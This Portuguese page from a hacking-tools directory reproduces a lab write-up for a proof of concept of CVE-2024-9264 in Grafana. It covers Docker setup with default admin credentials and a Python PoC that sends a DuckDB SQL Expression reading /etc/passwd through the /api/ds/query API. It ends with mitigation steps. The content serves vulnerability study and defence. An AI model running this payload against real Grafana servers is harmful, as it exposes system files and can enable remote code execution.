Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-9264 — PoC exploit para CVE-2024-9264: vulnerabilidade de Expressão SQL no Grafana que permite inclusão de arquivos locais e execução remota de código via injeção SQL no DuckDB. Inclui configuração de laboratório Docker e script de exploit em Python. | Kitploit
Ferramentas/GitHubGitHub/yeonchoda/cve-2024-9264
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e EducaçãoLabs e Prática
GitHubyeonchoda/cve-2024-9264

CVE-2024-9264

PoC exploit para CVE-2024-9264: vulnerabilidade de Expressão SQL no Grafana que permite inclusão de arquivos locais e execução remota de código via injeção SQL no DuckDB. Inclui configuração de laboratório Docker e script de exploit em Python.

Ver Repositório
2há 2 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2024-9264

Documento de referência https://github.com/vulhub/vulhub/tree/master/grafana/CVE-2024-9264

1. Resumo da vulnerabilidade

ItemDescrição
CVECVE-2024-9264
AlvoGrafana (SQL Expressions)
ImpactoLocal File Inclusion (LFI), Remote Code Execution (RCE)
GravidadeCritical (CVSS 9.9)
Condição de ataqueUsuário autenticado (privilégios de Admin)
Método de ataqueExecução de DuckDB SQL por meio da exploração do recurso SQL Expression

O Grafana é uma ferramenta de monitoramento de código aberto que visualiza diversos dados de servidores, aplicações, bancos de dados etc. na forma de gráficos ou dashboards de fácil visualização.

A CVE-2024-9264 é uma vulnerabilidade que ocorre no recurso SQL Expressions do Grafana.

Como o DuckDB SQL usado internamente pelo Grafana não é validado adequadamente, um atacante pode executar DuckDB SQL arbitrário por meio do SQL Expression.

Com isso, é possível:

  • Ler arquivos locais do servidor (LFI)
  • Executar comandos do sistema (RCE)
  • Vazar informações sensíveis

Neste exercício prático, a vulnerabilidade foi reproduzida executando o Grafana 11.0.0 em ambiente Docker e lendo o arquivo /etc/passwd por meio do PoC.


2. Configuração do ambiente

Ambiente de laboratório

ComponenteDescrição
SOUbuntu
DockerDocker Compose
Grafana11.0.0

Download do repositório

root@kitploit:~
git clone https://github.com/yeonchoda/CVE-2024-9264
cd CVE-2024-9264

Execução do Docker

root@kitploit:~
docker-compose up

Verificação da execução do Grafana

root@kitploit:~
http://localhost:3000

Execução do Grafana

As informações padrão da conta do Grafana são as seguintes:

root@kitploit:~
ID : admin
PW : admin

3. Condições da vulnerabilidade

Para que a vulnerabilidade ocorra, as seguintes condições devem ser atendidas:

  • Usar uma versão vulnerável do Grafana
  • Ter o recurso SQL Expressions disponível
  • O atacante conseguir fazer login no Grafana
  • O DuckDB SQL Expression estar habilitado

Neste exercício prático, foi usada a conta de administrador padrão (admin/admin).


4. Reprodução

Execução do PoC

Para ler o arquivo local, foi executado o seguinte comando:

root@kitploit:~
python3 PoC.py -u http://localhost:3000 -f "/etc/passwd"

O PoC gera a seguinte SQL Expression:

root@kitploit:~
SELECT * FROM read_csv_auto('/etc/passwd')

Ela é enviada para a API /api/ds/query do Grafana.


Verificação do resultado

O Grafana executou o SQL diretamente e retornou o conteúdo de /etc/passwd na resposta.

Execução do PoC.py

Além do arquivo /etc/passwd, outros arquivos também podem ser visualizados. Saída de /etc/group

Com isso, foi confirmado que a Local File Inclusion foi executada com sucesso.


5. Código do PoC

O PoC foi escrito em Python e executa o seguinte processo:

  1. Chamada da API do Grafana (/api/ds/query)
  2. Geração da SQL Expression
  3. Envio da solicitação no formato JSON
  4. Parse da resposta (JSON)
  5. Exibição do conteúdo do arquivo

O SQL gerado ao ler o arquivo é o seguinte:

root@kitploit:~
sql_query = f"SELECT * FROM read_csv_auto('{args.file}')"

A solicitação à API é feita da seguinte forma:

root@kitploit:~
response = requests.post(
    api_url,
    auth=(username, password),
    headers=headers,
    data=json.dumps(payload),
    verify=False
)

Isso também pode ser verificado com o comando curl. curl

6. Medidas de mitigação

1. Atualizar o Grafana para a versão mais recente

A medida mais eficaz é atualizar para a versão mais recente em que a vulnerabilidade foi corrigida.


2. Limitar o recurso SQL Expressions

Desative recursos SQL Expression desnecessários ou restrinja o escopo de uso aplicando o princípio do menor privilégio.


3. Proteger a conta de administrador

  • Alterar a conta padrão (admin/admin)
  • Usar senhas fortes
  • Minimizar o número de contas de administrador

Conclusão

A vulnerabilidade CVE-2024-9264 foi reproduzida após construir o Grafana 11.0.0 em ambiente Docker.

Usando o PoC escrito em Python, foi possível explorar o recurso SQL Expression e ler o arquivo /etc/passwd. Com isso, foi confirmado que, quando a validação de entrada do SQL Expression é insuficiente, arquivos sensíveis podem ser expostos e, dependendo do ambiente, isso também pode levar à execução remota de código. Essa vulnerabilidade pode ser prevenida por meio de medidas de segurança como atualização para a versão mais recente, limitação do recurso SQL Expression e proteção da conta de administrador.

Baixar ferramenta